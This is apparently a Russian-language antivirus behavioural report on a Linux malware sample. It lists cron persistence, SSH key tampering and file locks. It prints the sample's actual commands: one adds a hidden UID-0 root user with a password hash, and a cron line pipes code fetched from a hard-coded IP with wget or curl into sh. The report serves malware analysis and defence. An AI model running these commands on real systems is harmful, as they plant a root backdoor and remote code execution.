Техническая информация
Для обеспечения автоматического запуска и распространения:
Создает или модифицирует следующие файлы:
- /etc/cron.hourly/0
- /etc/crontab
Вредоносные функции:
Самоудаляется
Получает привилегии суперпользователя (root)
Запускает себя в качестве демона
Получает доступ к ключам SSH
- /root/.ssh/authorized_keys
Подменяет имя приложения на:
- -sh
Запускает процессы:
- crontab -
- useradd -u 0 -g 0 -o -d / vmhelper -p $1$AC.gxhwV$bLNJMPnrfQFOb3nRfb2LU0
- /bin/sh -c useradd -u 0 -g 0 -o -d / vmhelper -p \x27$1$AC.gxhwV$bLNJMPnrfQFOb3nRfb2LU0\x27 >/dev/null 2>&1
- /bin/sh -c echo -e \x22*/3 * * * * root (wget http://194.180.48.105/x86 -O- || curl http://194.180.48.105/x86)|sh\x22 | crontab -
Завершает следующие процессы:
- -sh
Выполняет операции с файловой системой:
Модифицирует права доступа к файлам:
- /etc/passwd+
- /etc/shadow+
- /etc/subuid+
- /etc/subgid+
Модифицирует владельца файлов:
- /etc/passwd+
- /etc/shadow+
- /etc/subuid+
- /etc/subgid+
Создает папки:
- /root/.ssh
Удаляет папки:
- /root/.ssh
Создает символические ссылки (симлинки):
- /etc/passwd.lock
- /etc/group.lock
- /etc/gshadow.lock
- /etc/subuid.lock
- /etc/subgid.lock
- /etc/shadow.lock
Создает или модифицирует файлы:
- <SAMPLE_FULL_PATH>
- /var/spool/cron/crontabs/tmp.sOC2Aw
- /etc/.pwd.lock
- /etc/passwd.824
- /etc/group.824
- /etc/gshadow.824
- /etc/subuid.824
- /etc/subgid.824
- /etc/shadow.824
- /etc/passwd-
- /etc/passwd+
- /etc/shadow-
- /etc/shadow+
- /etc/subuid-
- /etc/subuid+
- /etc/subgid-
- /etc/subgid+
- /var/spool/cron/crontabs/tmp.v8SpJh
- /var/spool/cron/crontabs/tmp.qhMqOk
- /var/spool/cron/crontabs/tmp.7vSh0j
- /var/spool/cron/crontabs/tmp.BlMgw7
- /var/spool/cron/crontabs/tmp.1Ilbib
- /var/spool/cron/crontabs/tmp.Ffb1U7
- /var/spool/cron/crontabs/tmp.LoEoOj
- /var/spool/cron/crontabs/tmp.IOsplc
- /var/spool/cron/crontabs/tmp.ppxjBf
- /var/spool/cron/crontabs/tmp.r0gRXf
- /var/spool/cron/crontabs/tmp.6N76Ok
- /var/spool/cron/crontabs/tmp.MIUQIh
- /var/spool/cron/crontabs/tmp.g1qxmj
- /var/spool/cron/crontabs/tmp.vCzWmg
- /var/spool/cron/crontabs/tmp.18NvB7
- /var/spool/cron/crontabs/tmp.3fKEcX
- /var/spool/cron/crontabs/tmp.FnYPAJ
- /var/spool/cron/crontabs/tmp.Z3FBpy
Удаляет файлы:
- /var/spool/cron/crontabs/tmp.sOC2Aw
- /etc/passwd.824
- /etc/group.824
- /etc/gshadow.824
- /etc/subuid.824
- /etc/subgid.824
- /etc/shadow.824
- /etc/shadow.lock
- /etc/passwd.lock
- /etc/group.lock
- /etc/gshadow.lock
- /etc/subuid.lock
- /etc/subgid.lock
- /var/spool/cron/crontabs/tmp.v8SpJh
- /root/.ssh/authorized_keys
- /var/spool/cron/crontabs/tmp.qhMqOk
- /var/spool/cron/crontabs/tmp.7vSh0j
- /var/spool/cron/crontabs/tmp.BlMgw7
- /var/spool/cron/crontabs/tmp.1Ilbib
- /var/spool/cron/crontabs/tmp.Ffb1U7
- /var/spool/cron/crontabs/tmp.LoEoOj
- /var/spool/cron/crontabs/tmp.IOsplc
- /var/spool/cron/crontabs/tmp.ppxjBf
- /var/spool/cron/crontabs/tmp.r0gRXf
- /var/spool/cron/crontabs/tmp.6N76Ok
- /var/spool/cron/crontabs/tmp.MIUQIh
- /var/spool/cron/crontabs/tmp.g1qxmj
- /var/spool/cron/crontabs/tmp.vCzWmg
- /var/spool/cron/crontabs/tmp.18NvB7
- /var/spool/cron/crontabs/tmp.3fKEcX
- /var/spool/cron/crontabs/tmp.FnYPAJ
- /var/spool/cron/crontabs/tmp.Z3FBpy
Устанавливает блокировку (lock) на файлы:
- /etc/cron.hourly/0
- /etc/crontab
- /etc/passwd
- /etc/shadow
- /etc/ssh/sshd_config
- /root/.ssh/authorized_keys
- /root/.ssh
Изменяет время создания/доступа/модификации файлов:
- /etc/passwd-
- /etc/shadow-
- /etc/subuid-
- /etc/subgid-
Сетевая активность:
Ожидает входящих соединений на портах:
- 127.0.0.1:5616
Устанавливает соединение:
- 8.#.8.8:53
- 19#.##0.48.105:1111
Посылает данные следующим серверам:
- 10#.###.122.127:3478
Прочее:
Собирает информацию о CPU
